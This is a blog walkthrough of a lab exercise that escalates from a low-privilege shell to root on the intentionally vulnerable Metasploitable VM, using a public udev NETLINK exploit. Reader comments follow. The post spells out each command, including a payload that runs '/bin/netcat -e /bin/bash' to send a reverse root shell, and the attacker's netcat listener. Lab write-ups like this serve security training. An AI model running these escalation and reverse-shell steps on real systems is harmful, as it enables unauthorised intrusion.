Monday, October 31, 2011

Attacking Metasploitable part 3

In the previous post we were able to compromise the metasploitable host in two phases:
1) gain initial access to the host through the distcc vulnerability which you can learn more about here
2) explore the remote host and figure out read/write permission on various directories and files. Then escalate our privileges using ssh and the authorized_keys file

In this post, we will go back to the initial breach and try to escalate our privileges another way.

So, say that we are sitting at our original shell running as the user daemon.

Now through a bit of reconnaissance, we can get the kernel version and try to escalate our privileges through a local priv escalation exploit.

uname -a

This command reveals to us that we are running kernel version 2.6.24. We will now head over to exploit-db and look for any local privilege escalations that could apply to us. Luckily we are able to find one here :

*   udev before 1.4.1 does not verify whether a NETLINK message originates 
*   from kernel space, which allows local users to gain privileges by sending 
*   a NETLINK message from user space.

This bit of code exploits a vulnerability in the udev service and allows us to escalate our privileges to the user running the service, root. Now all we need to do is download, compile, and provide necessary arguments. If all goes well, we should be able to get root access to this machine. First to download:

This code is saved as index.html and obviously we cannot compile C code in this format so we will rename it so priv.c

 mv index.html privs.c

Now we need to find out what compilers are on this machine. Since our exploit is written in C, We will search for the gcc compiler:

 find / -name "gcc" 2>/dev/null
This command looks for files with the name (gcc) looking in the entire filesystem ( / ) and the 2>/dev/null is simply redirecting the error messages to /dev/null. Because we currently have limited privileges, we will most likely get alot of permission denied error message from this find command. The results show us that this host does in fact have the gcc compiler installed and it is universally available to everyone.

Now we will compile our exploit.

gcc privs.c -o privs
If you dont know what gcc is and/or you dont understand what the above command does, you need to read up on programming and C source code.

/* Sidenote: it is VERY dangerous to download, compile, and run code created by hackers on a system so I would advise against it if you cannot get a basic understanding of what the actual exploit is doing. Download at your own risk! *\

Okay, now that we have our exploit ready to go, we can see from the source code that it needs an argument of the process id from the /proc/net/netlink socket. We can find that by issuing this command:

cat /proc/net/netlink

Our PID seems to be 3007, but lets check the udev service to make sure.

ps aux | grep udev

Our udev service has a PID of 3008 and 3008 - 1 = 3007 so our initial number is correct.

From our inital reconnissance in a previous post we found that this machine had fun things installed on it, such as netcat. If you dont know what netcat is (aka the tcp/ip swiss army knife) go here.

We will utilize the local copy of netcat to connect out to the attacker machine once the exploit runs to give us root access to this machine.

/* sidenote 2: I tried to get a meterpreter shell on this linux machine but I was unable to make it work. Every time I ran the ELF file produced by msfencode, it would throw a segmentation fault and the multi/handler would send the stagers over but would not be able to create a shell for some reason. Hopefully I will be able to figure it out and post it later. *\

Now to build our payload that the exploit will execute:

echo '#!/bin/bash' > run
echo '/bin/netcat -e /bin/bash 1337' >> run
Our payload will be to start netcat and to execute a bash shell once the program connects to the attacker machine. We use the echo command with the > to write to a file called 'run', because that is what the exploit is going to execute as the root user. We also need to start up our netcat listener on the attacker machine to catch the shell from the victim.
nc -vv -l -p 1337
The flags for netcat are pretty straight forward. Issue the -h flag if you dont know them.

Now all we have left to do is run the exploit with the required arguments.

./privs 3007

Bingo. We have successfully escalated our privileges to root.

To summarize:
1) Initial break in through distcc service
2) Did some exploring and learned that we are running kernel 2.6.24
3) Found a public exploit that took advantage of the vulnerable kernel version
4) Compiled exploit and set up payload/netcat listener
5) Ran exploit, escalated privileges, got r00t




  1. great post!

    I have done everything the same as you, however it won't connect. The attacker's machine listens, but doesn't pick up the connection as it should.

    any ideas? I'm running vmware for both machines.

  2. Your VM's must be networked together as either bridged mode or host only mode.